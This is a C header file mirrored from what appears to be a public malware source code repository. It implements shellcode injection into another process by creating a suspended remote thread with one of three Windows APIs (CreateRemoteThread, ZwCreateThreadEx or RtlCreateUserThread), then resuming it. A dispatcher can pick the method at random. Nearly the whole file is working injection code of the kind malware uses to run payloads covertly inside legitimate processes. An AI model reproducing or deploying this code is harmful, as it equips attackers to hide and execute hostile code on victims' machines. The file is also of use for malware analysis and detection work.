mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 07:19:23 +00:00
vxunderground
90 lines
3.0 KiB
C
90 lines
3.0 KiB
C
#pragma once
|
|
#include <stdio.h>
|
|
#include "ntddk.h"
|
|
#include "ntdll_undoc.h"
|
|
|
|
typedef enum {
|
|
usingRandomMethod,
|
|
usingCreateRemoteThread,
|
|
usingZwCreateThreadEx,
|
|
usingRtlCreateUserThread,
|
|
CREATION_METHODS_SIZE
|
|
} THREAD_CREATION_METHOD;
|
|
|
|
bool run_shellcode_in_new_thread1(HANDLE hProcess, LPVOID remote_shellcode_ptr)
|
|
{
|
|
NTSTATUS status = NULL;
|
|
//create a new thread for the injected code:
|
|
LPTHREAD_START_ROUTINE routine = (LPTHREAD_START_ROUTINE) remote_shellcode_ptr;
|
|
|
|
DWORD threadId = NULL;
|
|
HANDLE hMyThread = NULL;
|
|
if ((hMyThread = CreateRemoteThread(hProcess, NULL, NULL, routine, NULL, CREATE_SUSPENDED, &threadId)) == NULL) {
|
|
printf("[ERROR] CreateRemoteThread failed, status : %x\n", GetLastError());
|
|
return false;
|
|
}
|
|
printf("Created Thread, id = %x\n", threadId);
|
|
printf("Resuming added thread...\n");
|
|
ResumeThread(hMyThread); //injected code
|
|
return true;
|
|
}
|
|
|
|
bool run_shellcode_in_new_thread2(HANDLE hProcess, LPVOID remote_shellcode_ptr)
|
|
{
|
|
NTSTATUS status = NULL;
|
|
HANDLE hMyThread = NULL;
|
|
//create a new thread for the injected code:
|
|
if ((status = ZwCreateThreadEx(&hMyThread, 0x1FFFFF, NULL, hProcess, remote_shellcode_ptr, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS)
|
|
{
|
|
printf("[ERROR] ZwCreateThreadEx failed, status : %x\n", status);
|
|
return false;
|
|
}
|
|
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
|
|
printf("Resuming added thread...\n");
|
|
ResumeThread(hMyThread); //injected code
|
|
return true;
|
|
}
|
|
|
|
bool run_shellcode_in_new_thread3(HANDLE hProcess, LPVOID remote_shellcode_ptr)
|
|
{
|
|
NTSTATUS status = NULL;
|
|
HANDLE hMyThread = NULL;
|
|
CLIENT_ID cid;
|
|
//create a new thread for the injected code:
|
|
|
|
if ((status = RtlCreateUserThread(hProcess, NULL, true, 0, 0, 0, remote_shellcode_ptr, NULL, &hMyThread, &cid)) != STATUS_SUCCESS)
|
|
{
|
|
printf("[ERROR] RtlCreateUserThread failed, status : %x\n", status);
|
|
return false;
|
|
}
|
|
printf("Created Thread, id = %x\n", GetThreadId(hMyThread));
|
|
printf("Resuming added thread...\n");
|
|
ResumeThread(hMyThread); //injected code
|
|
return true;
|
|
}
|
|
|
|
//---
|
|
bool run_shellcode_in_new_thread(HANDLE hProcess, LPVOID remote_shellcode_ptr, DWORD method)
|
|
{
|
|
bool isSuccess = false;
|
|
DWORD max = CREATION_METHODS_SIZE - 1;
|
|
DWORD random = (GetTickCount() * 1000) % max + 1;
|
|
if (method > max || method <= usingRandomMethod) method = random;
|
|
|
|
printf("Injecting by method, id = %x\n", method);
|
|
switch (method) {
|
|
case usingCreateRemoteThread:
|
|
isSuccess = run_shellcode_in_new_thread1(hProcess, remote_shellcode_ptr);
|
|
break;
|
|
case usingZwCreateThreadEx:
|
|
isSuccess = run_shellcode_in_new_thread2(hProcess, remote_shellcode_ptr);
|
|
break;
|
|
case usingRtlCreateUserThread:
|
|
isSuccess = run_shellcode_in_new_thread3(hProcess, remote_shellcode_ptr);
|
|
break;
|
|
default:
|
|
return false;
|
|
}
|
|
return isSuccess;
|
|
}
|